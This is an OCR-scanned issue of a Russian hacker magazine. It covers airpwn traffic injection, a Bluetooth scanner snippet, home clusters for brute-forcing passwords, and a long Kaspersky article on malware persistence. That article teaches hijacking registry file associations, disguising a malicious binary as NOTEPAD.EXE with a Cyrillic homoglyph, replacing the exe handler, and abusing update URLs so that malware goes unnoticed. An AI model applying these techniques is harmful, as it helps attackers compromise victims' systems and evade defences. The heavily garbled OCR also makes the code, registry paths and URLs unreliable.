#сюда вставляем исходник любой картинки, который можно 
получить, просто открыв любое изображение в текстовом 
редакторе 



5. Обрабатываю весь проходящий через настрафикс помощью собс- 
твенных правил для нужных протоколов (НТТР, РТР ит.д.), заданных в 
конфигах аігрѵѵп 



аігрѵлі — і еРЬО — о ѵѵІапО — с Ьоте/зкѵог/сопР/аігрѵтей 
рпд 



Конструкция начинает работать, и глаза юзеров постепенно изменяются 
в диаметре после взгляда на похабные логотипы на известных ресурсах. 
Неужели дефейс? Нет, все это аігрѵѵп. Другой пример, в котором пользо- 
ватель коннектится на свой домашний РТР и, вместо приветствия, видит 
черт-те что, мы выложили на диск. Обязательно посмотри, любопытное 
зрелище, т 

Занимательный кодинг 

Продолжая расхваливать замечательный язык РуЙпоп, хочу поделиться 
реализацией простейшего сканера ЫиеіооіЬ-устройств, который с помо- 
щью модуля руЬ[ие 2 (огд.сваіБтіРесіи/руЫиеД можно уместить всего в 1 2 
строчках кода. 

Ргош ЫиеРооРй ішрогР * 

РагдеР_пате = " РРюпе" 

РагдеР_аййгезз = "КГопе" 
йеѵісез = йізсоѵег_йеѵісез ( ) 

Рог аййгезз іп йеѵісез: 

ІР РагдеР_пате == 1оокир_пате (аййгезз) : 

РагдеР_айгезз = аййгезз 
Ьгеак 

ІР РагдеР_аййгезз із пор ЕГопе: 

ргіпР "найдено ЫиеРооРЪ-устройство" , РагдеР аййгезз 
еізе : 

ргіпР "не найдено" 

Почему никсы? 

Бел и ты заметил, большая часть описанного в статье работаеттолько на 
ипіхѵѵаге/хбвб-платформах. Ксожалению (точнее, ксчастью), основной 
фактор, отпугивающий вардрайверов, — закрытые исходные коды плат- 
формы ѴѴІпбоѵѵз. Да, конечно, в произведении от Гейтса есть средства 
для разработки, связанной с ѴѴі-РІ, и подтверждением этому является 
ѴѴІ-РІ АРІ ( т5бп2.тісго5о[Рсот/еп-іі5/[іЬга гу/гш5706556.а5рх ). но оно не 
позволяет воплощать вардрайверские фантазии в полном объеме. Со- 
ветую тебе обзавестись одним из знаменитых наборов для ѴѴІ-РІ хакеров 
— ѴѴайіпих ( зоигсеіюгде.пеі/ргоіесів/ѵѵагііпих і или аналогичным БіѵеСО- 
софтом для проведения тестов на проникновение (Васкігаск 2, Репіоо, 
Аибііог). Как правило, на нихуже предустановлены все необходимые 
модификации и драйверы. 
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Разведение Интернета в домашних условиях 




Бь- страз 

шсутрмііка 
ИоТ С 'С 



Ин І^Н“Н Ь ХН 2 ПКІ -ІІЛІКь 

{оугнііэтг-эу п і^г^смом мацлатг-^прнстіпке 
„ппя ні-пгрлртипнсггсі тійлгпм.г і енир 
Э "СТтоР. (^СПРОВОДН™*' ЧО^УКУ 
=: ■ѴіОиі-Н \Ѵ И д-,т:іг ІГ- ІЩІ^фину Д'М 
^ і.иі іични.-! іи іых пищиках. 
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Одна голова хорошо, 
а две лучше 



Грамотное использование двух компьютеров дома 

Чтобы обустроить свой рабочий стол по-хакерски (всем пионерам на зависть), необходимо 
разобраться с хитросплетениями кабелей, научившись подключать к одному компьютеру не- 
сколько мониторов и, наоборот, запитывать свой основной монитор от нескольких компьюте- 
ров, объединяя их в домашний кластер или даже группу кластеров, перемалывающих пароли со 
скоростью реактивного истребителя на форсаже. 



аз уж развелась куча девайсов, использующих беспровод- 
ную связь, Два компьютера — это не роскошь, а суровая 
хакерская необходимость. Автор всегда мечтал о хакерской 
норе, окруженной по периметру мониторами со змеящи- 
мися кабелями, в полумраке которой можно было бы ломать программы 
и вскрывать всевозможные защиты. Однако при воплощении этой идеи 
вжизнь неожиданно выяснилось, что держать на своем рабочем столе 
более двух мониторов нетолько неудобно, но еще и вредно для здоровья, 
а свои глаза хакер должен беречь, поскольку они его важнейший инстру- 
мент (после головы, конечно). 

Зачем может понадобиться еще один компьютер? Ну мало ли, для экс- 
периментов с альтернативными операционными системами, например 
с ОЫХ, Ыпих, хВЗй, Ѵівіа и т.д., или для удаленной отладки драйверов 
через ѴѴІпсіоѵѵб Кегпеі ОеЬиддег. Виртуальные машинытипа ѴМ ѴѴаге в 
какой-то степени снижаютактуальность проблемы, позволяя держать 
на одном компьютере сколько угодно операционных систем, но... какже 
они тормозят! Ктомуже если потребуется отладить драйвер физического 
устройства, то без прямого доступа кжелезутутуже не обойтись. 
Некоторые операции (обработка цифрового звука и видео) пожирают все 
системные ресурсы, и работать на таком компьютере становится неком- 



фортно. А при видеозахвате вообще не рекомендуется запускать посто- 
ронние приложения, чтобы нетерять кадры. Но ведь не сидеть же и не 
курить в сторонке! Лучше выделить для этой цели отдельный компьютер! 
Не стоиттакже забывать и о том, что хакер должен тестировать свои про- 
граммы на различных аппаратных платформах: от Іпіеі до АМО, включая 
32- и 64-разрядные версии, в противном случае можно здорово огрести. И 
хотя существуют эмуляторы АМ 0x86-64, работающие на х86-платформах 
(взять тотже В0СН5, в народе прозванный борщом), они все еще содер- 
жат множество ошибок... 

Короче говоря, автор всячески агитирует за «живое» железо. Компьюте- 
ров должно быть несколько, как минимум два (у самого автора ихшесть!). 
При нынешних ценах на кремний купить их для хакера не проблема. Вот 
только где разместитьтакое количество мониторов?! 

Электронные коммутаторы 

Идея подключения кодному компьютеру нескольких мониторов возникла 
не вчера и даже не позавчера, а очень давно. С технической точки зрения 
тут все очень просто. Берем провода от одного, двух, трех мониторов и 
подключаем их к видеокарте через электронный коммутатор — он хоть 
и дороже механического, зато намного надежнее. Аналогичным путем 
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Внешний вид бесплатного видеоредактора АѴЮетих 



поступаем с мышью и клавиатурой, получая в результате 
настоящийтерминал, управляющий остальными компьюте- 
рами, словно штурвалом. 

Обустроив таким образом свое рабочее место, мы можем 
взаимодействовать с практически неограниченным коли- 
чеством компьютеров (втом числе и моральноустаревших, 
используемых в качестве плацдарма для игрушек времен 
М5-005). Оченьудобно! Ктомуже совсем недорого. Порядка 
сотни долларов или околотого. Спрашивай в аптеках, тьфу, 
в компьютерных салонах КѴМ-свитчи, получившие свое 
название по первым буквам слов кеуЬоагсі (клавиатура), ѵібео 
(видео) и тоиве (мышь). 

В зависимости отмодели количество обслуживаемыхтермина- 
лов варьируется отдвух (в самых простых вариантах) до шести. 
Больше шести автор еще не встречал, хотя и не видит никаких 
ограничений, которые могли бы воспрепятствовать этому. Мак- 
симальная длина кабеля между компьютером и свитчем обычно 
составляет 1 0 метров (реже 1 00 метров), чего для наших целей 
более чем достаточно. При желании можно рулить компьюте- 
ром, установленным в соседней комнате или даже вынесенным 
на балкон для уменьшения шума (особенно это актуально для 
домашних серверов, работающих в круглосуточном режиме). 
Более совершенные (а значит, и дорогостоящие) устройства 
с гордым названием «коммутаторы» несут на своем борту 
процессор, сетевую карту, буферную память и прочие элект- 
ронные компоненты, позволяющие кодироватьаналоговый 
сигнал и передавать его в цифровой форме по ЕіЬегпеІ- 
сетям. Это существенно упрощает прокладку кабелей и 
значительно увеличивает их предельно допустимую длину, 
позволяя управлять компьютерами хоть из соседней комнаты, 
хоть из другого города. Более удобного средства управления 
офисными компьютерами из своего дома, пожалуй, и не найти. 
Довольно хорошо зарекомендовала себя фирма Міпісот, 
предлагающая трудовому народудве вполнеудачные мо- 
дели — РЬапіот ОіаІ-ІІр Ретоіе Ассезз и Бтагі ІР Ехіепбег 
БѵѵіісИ Оѵег ІР. Первая продается по цене порядка $800, 
вторая же — $3500. Вот и думай, стоит это удовольствие таких 
денег или нет, особенно если речь идет не о промышленном 
использовании, а домашней компьютерной системе. 

Но деньги — это еще что! КѴМ-свитчи в силу чисто физичес- 
ких ограничений едва держат картинку 800x600/60(75) Гц, 
а 1280x1024/60 Гц — это уже вертикальный предел, да и тот 
весь дрожащий, малоконтрастный и замутненный. Коммута- 
торы дают намного более качественную картинку (цифровой 
сигнал как-никак), но мало кто из них может похвастаться 
поддержкой режимов свыше 800x600. 

Короче говоря, для управления сервером вполне сойдет, но 
для полноценной работы явно не годится. Впрочем, ктем, 





Перевод видеоплеера ВЭРІауег’а в П6В-режим для прос- 
мотра видео на двух мониторах сразу 



чьей превалирующей средой обитания является консоль, 
сказанное не относится. Даже самые дешевые свитчи 
держат консольные режимы вполне корректно, без заметных 
искажений. 

Два входа одного монитора 

Практически все современные БСО-мониторы имеютдва 
входа: аналоговый (0-51ІВ), оставленный для совместимости 
сустаревшими видеокартами, и цифровой (ОѴІ-Б), ориен- 
тированный на видеокарты нового поколения. Некоторые 
мониторы автоматически определяют, к какому именно входу 
подключена видеокарта, но большинство остальных имеют 
специальный селектор каналов, как правило, вынесенный на 
отдельную панель. Нажатием всего одной кнопки мы можем 
переключаться с аналогового входа на цифровой и тутже 
возвращаться обратно. 

Ачто если взять два компьютера, поставить их рядышком и 
подключить к одному монитору? Первый — через аналого- 
вый вход, второй — через цифровой. Сложнее справиться с 
мышью и клавиатурой. Вообще говоря, две клавиатуры легко 
размещаются на столе и смотрятся весьма сексуально, ктому 
же, поскольку и мышь, и клавиатура представляют собой 
Р5/2-устройства, их без особой опаски можно перетыкать 
прямо налету, не боясь чего-нибудьспалить. Если пере- 
тыкать неинтересно — пожалуйста, ктвоим услугам самый 
дешевый КѴМ-свитч, который только найдется на рынке. 
Достоинство предложенной технологии в исключительно вы- 
соком качестве картинки (фактически мы получаем картинку 
через его «родной» интерфейс), а недостаток в ограниченной 
длине соединительных кабелей (всего несколько метров) 
и невозможности подключения третьего монитора. То есть 
если у нас есть четыре компьютера, то без двух мониторов 
все равно не обойтись. Но, согласись, два монитора — это 
все-таки не четыре. 

Ктомуже применение одного способа не исключает ис- 
пользование другого. Допустим, у нас имеется два основных 
компьютера, подключенных к одному монитору через анало- 
говый и цифровой входы. Остальные компьютеры можно под- 
соединить через коммутаторы ктомуже самому или другому 
монитору, смирившись с низким качеством картинки, либо 
же выделить для них еще один монитор с прямым подключе- 
нием, если падение качества недопустимо. 



> Ипкз 

ѵѵѵѵѵѵ.раиі.зіасіеп. 
огд/ІідЫз-оиі/гіІое. 
Ыті — обзор систем 
удаленного управле- 
ния (на английском 
языке); 

ѵѵѵѵѵѵ. геаіѵѵеазеі. 
сот/іпІго.ЫтІ 

— описание альтер- 
нативной платы уда- 
ленного управления, 
микрокод которой 
распространяется по 
открытой лицензии 
(на английском 
языке); 

ѵѵѵѵѵѵ. кѵт в .со гл 

— технические 
характеристики 
огромного количест- 
ва систем удален- 
ного управления 
(преимущественно 
КѴМ -коммутато- 
ров, на английском 
языке); 

ѵѵѵѵѵѵ.42и.сот/ 
ІеІегеасЬ Ьк.Ыт 

— описание хороше- 
го КѴМ -коммутатора 
ТП364 (на английс- 
ком языке); 
ЬирѴ/гесІІІЬ.пагосІ. 
ги/азтсіосз/авпп 
бос 07.2Ір — архи- 
тектура ввода-вы- 
вода персональных 
ЭВМ ІВМ РС. 



Домашний кластер своими руками 

При наличии нескольких компьютеров (большей частью 
бесцельно простаивающих и впустую транжирящих компью- 
терное время) их можно объединить в кластер, что обойдется 
намного дешевле покупки многопроцессорной машины. К 



ХАКЕР 08 / 104 / 07 



► 037 






■: . 



*, - . 






х 



'#ч 

N ^|\ч^г: , 

Ч Т V. Ч )\Ч ! 




Воттак выглядиттипичный коммутатор 



сожалению, операционные системы семейства ѴѴІпсіоѵѵб позволяют рас- 
параллеливать между соседними компьютерами только специальным об- 
разом написанные приложения, поддерживающие механизм удаленного 
вызова процедур (он же Петоіе Ргосебиге Са II, или сокращенно РРС). 
Місгобо^і Ріаііюгт 5БК (распространяемый бесплатно) и МЗБЫ (при- 
лагаемый к компилятору Ѵіеиаі Зіисііо) содержат множество примеров 
РРС-программ, исполняющихся на нескольких компьютерах и обмени- 
вающихся полученными данными с центральнымтерминалом (условно 
называемым сервером). Воттолько к реальной жизни они не имеют 
никакого отношения. 

В реальной жизни нам приходится иметь дело суже написанными 
программами, не поддерживающими механизм РРС, и даже при наличии 
исходных текстов (а откуда они у нас) поддержку РРС реализовать просто 
так не получится. Но, если хорошенько подумать головой и немножко 
поработать руками, можно найти другой путь, которым мы, собственно 
говоря, и пойдем. 

Допустим, нам необходимо пережать цифровое видео, добытое с 0Ѵ0. 
Сжатие вХѴЮ/0іѵХ/х264с максимальным качеством даже на самых быст- 




рых компьютерахзанимает десятки часов и при этом ни один популярный 
кодек не поддерживает кластеризации. Наша задача — заставить его 
исполняться на N компьютерах, причем это необязательно должны быть 
компьютеры идентичной конфигурации с одинаковым быстродействием. 
Главное, чем больше Ы,тем лучшедля нас. 

Берем любой видеоредактор (например, горячо любимый автором и 
бесплатно распространяемый АѴЮетих), режем исходный файл на куски 
размером, пропорциональным мощности наших компьютеров, и сжимаем 
каждый видеофрагмент независимо от всех остальных, а полученные «пе- 
режитки» склеиваем на самом мощном компьютере (благо этот процесс 
занимает совсем немного времени). 

Аналогичным образом обстоят дела и с перебором паролей. Практически 
всехакерскиеломики позволяют задавать интервал перебора, чем мы 
успешно и воспользуемся, раскидав переборщики по сети. Причем сов- 
сем не обязательно делать это вручную. Достаточно написать несложный 
скрипт, генерирующий пакетные файлы, вызывающие переборщики с 
заданными параметрами. 

Также можно ускорить дизассемблирование и компиляцию. Поскольку 
большинство проектов состоитболее чем из одного файла, то процедура 
их сборки элементарным образом распараллеливается между нескольки- 
ми компьютерами. 

Заключение 

Естественно, возможности домашних кластеров этим не исчерпываются. 
Главное — иметь фантазию, а задействовать пустующие вычислительные 
мощности не проблема ! т 



Один компьютер — два монитора 



Иногда приходится решать прямо противоположную задачу, подключая 
к компьютеру сразу два монитора: один (стоящий на столе) для работы, 
другой (прикрученный к потолку над кроватью) для просмотра видео и 
экзотических фильмов, способствующих бурному занятию сексом (глав- 
ное, чтобы в самый ответственный момент монитор не отвинтился и не 
прервал весь процесс). 

Какэто можно сделать? Технически проще, надежнее, качественнее и 
дешевле — нарыть видеокарту с двумя выходами. Они бывают разные: 
либо оба аналоговые, либо один аналоговый, а другой цифровой. Карты с 
двумя цифровыми выходами в полезрения автора еще не попадали, хотя 
он вполне допускает их существование. 

Казалось бы, что можетбыть проще?! Втыкаем разъемы в нужном порядке 
(в ненужном они ни за что не воткнутся, благо производители позаботи- 
лись). Включаем компьютер и... на первом (основном) мониторе все нор- 
мально, а на втором либо черный экран, бездонный, как ночное небо, либо 
рабочий стол, окна приложений, а вместо видео — фиолетовый квадрат. 
Что это за беда такая и как ее побороть? 

Хорошо — карта имеетдва выхода, но она не знает, как ими распорядить- 
ся. За это отвечаетдрайвер. Второй монитор можетбыть совершенно 
независим от первого и выдавать совсем другую информацию. Соответс- 
твующие АРІ -функции поя вились уже давно (кажется, начиная с ѴѴІпсіоѵѵб 
98), однако мыщъх’у до сих пор не известно ни одной популярной програм- 
мы, в которой они были бы задействованы. 

Другой вариант— поставитьдва монитора рядом, расщепив рабочий стол 
пополам иувеличивтем самым горизонтальное разрешение вдвое. 



Дополнительная программная поддержка в этом случае нетребуется 
(достаточно драйвера и видеокарты), однако работать с таким «чудом 
техники»без содрогания невозможно, и потому оно идетлесом (впрочем, 
широкоформатные фильмы на нем смотреть довольно приятно, естест- 
венно, с расстояния не меньше метра). 

Вариантномертри — клонирование мониторов: то, что видно на одном 
мониторе, будет видно и на другом. За исключением, пожалуй, ви- 
деофильмов. А все потому, что для увеличения производительности 
большинство видеоплееров используеттак называемый режим оверлея 
(оѵегіау гпобе), в котором видеопоток проходиттранзитом сквозь карту 
прямо на монитор, минуя видеопамять и другиеузлы, участвующие в 
клонировании. 

Побороть ситуацию можно двумя путями: либо приобрести карту, под- 
держивающую полноценное клонирование на аппаратном уровне без 
помощи со стороны драйвера (например, Маігох МІІІепіит 6450), либо 
перевести видеоплеер в РбВ-режим. К сожалению, далеко не все видео- 
плееры умеют это делать. Вот, например, ВЗРІауеги Мріауег — умеют, а 
штатный МісгобоЙ Мебіа Ріауег— нет. 

Покажем, какфорсировать Р6В-режим в ВЗРІауег'е. Это просто! В диало- 
говом окне Рге^егепсез выделяем пунктѴібео (расположен слева), затем 
переходим к вкладке Ѵібео Репбегіпд (справа), итам, в Репбегіпд гпобе 
находим нужный нам Іпіегпаі Репбег Р6В гпобе, после чего жмем ОКи с 
удовлетворением смотрим фильм на двух мониторах сразу. Внимание: 
Р6В-режим слегка замедляет производительность и может приводить 
к нежелательным искажениям цветов, но... тут уже или дешевая карта с 
программным клонированием и невысоким качеством, или будьлюбезен 
раскошелиться на нормальноежелезо. 
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Итоги конкурса 



Настало время подвести итоги конкурса, который мы проводили в про- 
шлом месяце совместно с компанией ВеЬоЫег. Мы разыгрывали три клас- 
ных тюнера: 

Чтобы вырвать приз из наших рук, тебе надо было ответить на три вопроса: 



1. Что вернет следующий код? 

і Г(0==”аа 1 ”) {есНо "ер";} еіве {есНо "пе";} 

2 . В какой версии рЬрВВ найдена последняя публич- 
ная уязвимость, и что это за уязвимость? 

3. Возможно ли прослушать 65М-телефон? 

4 . На каких чипах работаюттюнеры ВеЬоІсІ ТѴ Мб и 
ВеЬоІсІ ТѴМбЕхІга? 



Первыми правильно на них ответили наши верные читатели Гіцаск Нцаск 
[Нцаскшд@уапс1ех.ги]р Долгополов Владислав [ѵІасІІ5Іаѵ.88(д)таі1.ги] 
ііса$ІіЬох [савІіЬохо.5(а>дтаі1.сот]. Поздравляем победителей. 










КРИС КАСПЕРСКИ 





Хроника внедрений ^ 
в автозагрузку 



Скрытые ключи автозапуска в системном реестре 

Существует множество широко известных ключей автозапуска, в которые прописываются 
вирусы, черви, трояны и другие программы, пытающиеся внедриться в атакуемую систему, 
и которые проверяют антивирусы, брандмауэры и прочие сторожевые механизмы, бьющие ха- 
керов еще на старте. Чтобы выжить в этом суровом мире, полном ужасных защитных монстров, 
приходится извращаться не по-детски и разрабатывать методики поиска малоизвестных клю- 
чей автозапуска, не подвластные никаким анализаторам реестра. 



ля поддержания своей жизнедеятельности малварь долж- 
на хотя бы изредка получать управление. В идеале — при 
каждой загрузке операционной системы, что достигается, 
например, через прописывание пути к исполняемому фай- 
лу в следующей ветви системного реестра: НКСІІ\50РТѴѴАРЕ\Місго5О'ГС\ 
ѴѴІпсІоѵѵ5\СиггепіѴег5Іоп\Рип. Однако это очень плохой способ, 
поскольку появление нового элемента в разделении редко остается 
незамеченным. Онемзнают как защитные механизмы (антивирусы, 
персональные брандмауэры, разные диагностические утилиты), так и 
продвинутые пользователи. 

Хакеры и разработчики антивирусов ведут непрекращающиеся ар- 
хеологические раскопки реестра, ковыряя его с двух сторон, причем 
каждая сторона стремится найти как можно больше ключей, прямо или 
косвенно связанных с автозапуском. Необязательно юзать общесис- 
темные ключи, относящиеся непосредственно к ѴѴІпсІоѵѵз. Для решения 
поставленной задачи вполне достаточно прицепиться к часто запуска- 
емому приложению, например к ІЕ, стартуя вместе с его запуском. 
Реестр содержиттысячи (если не сотни тысяч!) подходящих клю- 
чей, но только несколько десятков из них контролируются защитны- 



ми механизмами. На хакерских форумах начинающие кодо ко пател и 
часто спрашивают полный список ключей автозапуска или пере- 
чень новых ключей, появившихся вХР, Висте или другой операци- 
онной системе. Их вопрос обычно остается без ответа (обвинения 
в ламеризме не в счет), а все существующие списки (которые, 
кстати говоря, можно запросто выковырять из любой антивирусной 
программы — они там, как правило, лежат «открытым текстом») 
представляют интерес в основном для разработчиков защит. Ис- 
пользовать их для внедрения малвари — сплошное пионерство, и 
долго такая малварь не проживет. 

Мы не будем приводить готовых ключей (ну разве что в качестве приме- 
ра). Напротив, мы расскажем, как находить их самостоятельно, а также 
рассмотрим основные ошибки начинающих хакеров, совершаемые с 
завидным постоянством. Это только кажется, что внедриться в систему 
просто, на самом делетут слишком много подводных камней и скрытых 
граблей. 

Статья также будет интересна и тем, кто озабочен стерильностью своей 
системы, но не знает, где обычно хакеры ныкают вирусы и на какие 
ветви реестра следует обращать внимание в первую очередь. 
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Тип файла, соответствующий расширению 1x1 
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План перехвата ассоциации расширений 

Ассоциация расширений? А разве существуеттакая? Ско- 
рее уж ассоциирование расширений с обрабатывающими 
их приложениями. Это технически верно, но уж слишком 
длинно для заголовка. Впрочем, не будем придираться к 
формулировкам, а лучше сразу определимся с перехватом. 
Запустим редактор реестра и откроем раздел НКЕѴ_ 
СЕА55Е5_П00Т, образованный (как известно) путем слия- 
ния данных из двух источников: Н КЕМ\50ЕТ\Л/АПЕ\С1авве5 
и НКС1Л50ЕТ\Л/АПЕ\С1авве5. Первый носит глобальный 
характер, распространяющийся на всех пользователей, 
зарегистрированных в системе, и требует для своей моди- 
фикации права администратора (которых у мал вар и чаще 
всего нет). Второй относится только ктекущему пользова- 
телю, прав администратора он не требует, но и не затраги- 
вает всех остальных. 

Отсюда правило: сначала мы пытаемся модифицировать 
НКЕМ\50ЕТ\Л/АПЕ\С1авве5 и, если обламываемся, либо 
повышаем свои привилегии до уровня администратора 
(используя тот или иной ха к), либо переключаемся на 
НКСІІ\50ЕТѴѴАРЕ\С1а55е5, будучи готовыми ктому, что 
прав на его модификацию у нас может и не быть. Однако в 
живой природе такие жестоко ущемленные пользователи 
практически не встречаются, значительная их часть посто- 
янно сидит под администратором — а потом ещеудивляют- 
ся, откуда вирусы берутся в таких количествах! 

В [НКЕМІ НКСІІ]\50ЕТѴѴАРЕ\С1а55е5, помимо прочей 
полезной информации, хранится списокзарегистрирован- 
ных расширений и указания по их обработке при запуске 
файлов через стандартную оболочкутипа проводника или 
команду віагі, набираемую в командной строке. Файловые 
менеджеры ЕАР и Тоіаі Соттапбегтакже используют 
списокзарегистрированных расширений путем вызова 
АРІ-функций 5Ье11Ехеси1е/5ЬеиЕхеси1еЕх и/или команды 
віагі (поведение зависит от текущих настроек). 

За этими ветвями практически никто не следит. «Практи- 
чески» — потому что ассоциированные приложения могут 



проверять целостность ассоциаций при каждом запуске 
и ругаться матом, если их расширение оказалось сопос- 
тавлено с посторонним приложением. Также некоторые 
защитные системы могут контролировать ассоциации стан- 
дартных системных расширений типа ехе, однако в общем 
случае перехватассоциаций остается никем не замечен- 
ным, особенно если действовать по плану. А есть ли у нас 
план?! Конечно же есть! 

Прежде всего необходимо выбрать расширение, которое 
мы собираемся атаковать. Это должно быть довольно 
распространенное расширение, открываемое пользовате- 
лями по меньшей мере несколько раз вдень, напримеріхі 
или Ьтр. Нет, 1x1 все-таки лучше. Вот и будем его терзать по 
полной программе. 

Открываем НКЕУ_СЕА55Е5_Р00Т\.1х1, смотрим на 
значение по умолчанию и видим, что там в данном случае 
находится ключ Іхііііе, описывающий тип файла, а путь к 
сопоставленному с ним приложению хранится в НКЕѴ_ 
СЕА55Е5_Р00Т\іх11і1е\вЬеи\ореп\соттапб, где обоз- 
начена строка «%5у5ІетРоо1%\ву5Іепп32\М0ТЕРАВ.ЕХЕ 
%1 ». Магическое число «%1 » представляет собой первый 
аргумент командной строки, содержащий имя открываемо- 
го файла, ну а «%5у5ІегпНоо1%\5ув1епп32\І\ЮТЕРАП.ЕХЕ» 

— соответственно, всем известный блокнот. 

Поставим перед собой задачу перехватить обработчик ас- 
социаций, запуская свой собственный исполняемый файл 
(необязательно вредоносный!) при открытии текстовых 
файлов так, чтобы факт перехвата остался незамеченным. 
Самое простое, что только можно сделать, — это поме- 
нять «%5у5ІетРоо1%\ву5Іет32\М0ТЕРАВ.ЕХЕ %1 » на 
«ту_оѵѵп_раіЬ\ту_оѵѵп_та1\л/аге-1і1е.ехе %1 », заставив 
систему вызывать ту_оѵѵп_та1ѵѵаге-1і1е.ехе вместо блок- 
нота. Естественно, блокнот при этом придется вызывать 
нам самим, не забыв передать ему первый аргумент коман- 
дой строки (некоторые хакеры забывают, в результате чего 
блокнот открывает пустой файл, высаживая пользователя 
на измену). 









> ѵѵагпіпд 

Сама по себе мо- 
дификация ключей 
системного реестра 
еще не есть преступ- 
ление, даже если она 
осуществляется без 
ведома владельца 
машины. Если бы 
это было незаконно, 
пришлось бы сажать 
всех разработчиков 
инсталляторов, ведь 
никто из пользо- 
вателей не можете 
уверенностью ска- 
зать, какие именно 
ключи реестра они 
изменяют. Но вот 
если ты с ее помощью 
запускаешьтроян... 
в общем, задумайся, 
приятель! 
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Вот оно — приложение, ассоциированное с текстовыми файлами 



Кстати говоря, это необязательно должен быть именно блокнот. 
Достаточно многие пользователи используют нестандартные ре- 
дакторы, поэтому мы всегда должны считывать исходное содержи- 
мое\МШе\5Ьеи\ореп\соттапсІ, перемещая его куда-нибудь внутрь 
реестра или своего собственного іпі-файла — туда, где его никто не 
найдет. Жестко прошивать вызов блокнота внутри ту_о\л/п_таІл/ѵаге- 
Ше.ехе категорически недопустимо! Если у тебя текстовые файлы 
открываются блокнотом, это еще значит, что аналогичным образом 
обстоят дела и удругих пользователей! Это грубейшая ошибка. 
Остается устранить одну мелкую недоработку — и мал варь готова к внед- 
рению в промышленную эксплуатацию. Что это за недоработка? Сейчас 
увидим! Щелкаем по «Моему компьютеру» (ну в смысле потвоему), в меню 
«Сервис» выбираем пункт«Свойства папки», в открывшемся диалоговом 
окне переходим ко вкладке «Типы файлов», находим среди расширений 
ТХТ, нажимаем кнопку «Дополнительно», в «Действиях» выбираем Ореп 
и... тайное сразу же становится явным! Система честно сообщает, что тек- 
стовые файлы она открываете помощью ту_о\л/п_та1\л/аге-Л1е.ехе, что не 
может не вызыватьу продвинутых пользователей серьезных подозрений, 
плавно переходящих вуверенность, что их поимели. Нет, нам это не подхо- 
дит, и, чтобы малварьжила и процветала, нужно заныкать ее получше. 



I 



ображение миниатюр в проводнике, которым до сих пользуется большинство 
ользователей 




Идем на хитрость 

Идея: берем ЫОТЕРАО.ЕХЕ (или то имя, что ассоциировано с текстовы- 
ми файлами у пользователя) и меняем одну латинскую букву на соот- 
ветствующую ей русскую, аналогичную по начертанию, например, букву 
А, после чего переименовываем ту_оѵ\т_таІѵѵаге-Ше.ехе в ЫОТЕРАО. 
ЕХЕ (где А — русская) и осуществляем перехват по вышеописанной 
методике. 

Даже если у пользователя установлена противная защитная програм- 
ма, следящая за расширениями и ругающаяся при их изменении, жер- 
тва никак не отреагирует на предупреждение об опасности, посчитав, 
что это просто глюк. Посуди сам: «Внимание! Ассоциация расширения 
М-файлов изменилась с КЮТЕРАО.ЕХЕ на ЫОТЕРАО.ЕХЕ». Типа «масло 
масляное». 

Впрочем, учитывая, что некоторые шрифты слегка по-разному отоб- 
ражают схожие латинские и русские символы, наш обман, в принципе, 
можетбыть и разоблачен, поэтому крайне желательно, чтобы заменяе- 
мая буква встречалась в имени файла только однажды — иначе вероят- 
ность, что различия в начертании попадут в поле зрения пользователя, 
существенно увеличится. Другая проблема состоит в том, что пользо- 
ватель, просматривающий каталог ѴѴІпсіоѵѵб, может оченьудивиться, 
увидев два «одинаковых» файла. Поэтому мал варь лучше убрать в 
другой каталог. 

Естественно, на файлы, открываемые в ЕАР’е по <Е4>, это никак не 
подействует, поэтому, если известно, что жертва активно пользуется 
ЕАП’ом, следует искать другой путь. 

Хорошая идея — подменить стандартный обработчик ехе-файлов, 
которые открываются пользователем намного чаще, чем все файлы 
документов, вместе взятые (на самом деле это плохая идея, поскольку 
за ассоциациями исполняемых файлов следят достаточно многие 
сторожевые программы, но... кто не рискует...). 

Открываем НКЕУ_СІ_А55Е5_П00Т\.ехе, видим, что значение 
поумолчаниюустановлено в ехебіе, лезем в НКЕУ_СЕА55Е5_ 
Н00Т\ехеШе\5Ье11\ореп\соттапс1, где находится « " % 1 " %*», что в 
переводе на русский язык означает «запустить выбранный файл» (имя 
которого передано в первом аргументе командной строки: 

«%1 »), передав ему все аргументы, какие только есть: «%*». Если 
поменять «%1 » на путь/имя нашего файла-перехватчика, то он будет 
запускаться всякий раз, когда пользователь щелкает по иконке 
исполняемого файла или нажимает на <Епіег> в ЕАП'е. На некоторых 
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і 1 — хакерских форумах высказывается мнение, что такая замена носит 

рекурсивный характер, то есть файл -перехватчик отлавливает запуски 
всех исполняемых файлов, включая самого себя, в результате чего мы 
зацикливаемся в бесконечном рекурсивном спуске. На самом деле 
подобное утверждение совершенно безосновательно: система а нал и - 
зируетассоциации только однажды, и потому рекурсии не возникает. 

Исследуем реестр сами 

Перехватассоциаций — хоть и привлекательный, но все-таки не 
единственно возможный трюк, позволяющий малвари внедряться в 
систему. При желании можно пойти совсем иными путем, о котором не 
знает никто, кроме нас. 

Как искать ключи, ответственные за автозагрузку? Да очень просто: 
запускаем редактор реестра, вбиваем в поиск «.ехе» или «.сіи» и ищем 
все ветки, откуда вызываются исполняемые файлы и динамические 
библиотеки. Вот, например, АбоЬе АсгоЬаІ содержит следующую заме- 
чательную ветвь НКЕМ\50ЕТѴѴАПЕ\АсІоЬе\АсІоЬе АсгоЬаАРгіпіМе, в 
которой зарыто если не сокровище, то что-то на него похожее: 

ШЬ2КРМІпзБ : ЛОБрз :/ /талам. ргіпБте . 

сот/ зиррогБ / асІоЬе / РгіпБМеБг іѵегТогМіпскжз2 0 00. ехе 

ІШБ9ХРМІпзБ : ЛОБрз : / /талам. ргіпРте . 

сот/ зиррогБ / асІоЬе / РгіпБМеБгіѵег ТогШ.пскжз9х . ехе 

БКББТРМІпзБ : ЪЩДрз : / /ѵмтѵ. ргіпБте . 

сот/ зиррогБ / асІоЪе / РгіпБМеБгіѵегТогМпскжзБТ . ехе 

БКБХРРМІпзБ : ІіББрз : / /тапам. ргіпБте . 

сот/ зиррогБ / асІоЪе / Рг іпБМеБг г ѵег Т огМіпсіотагзХР . ехе 

Не нужно иметьсемь пядей волбу, чтобы понять, что здесь лежат ссыл- 
ки на динамически загружаемые драйверы для печати рсК-документов 
под разные системы. Так почему бы их не изменить?! Ну, драйверы 
печати — это еще туда-сюда (скорее всего, они уже установлены), но 
куча программ содержит II РІ_'ы ксерверам обновлений, которые про- 
веряются при каждом запуске или через определенные промежутки 
времени. 

Конечно, это не совсем автозагрузка, точнее, совсем не автозагруз- 
ка, но для внедрения малвари в систему она очень даже пригодна! 

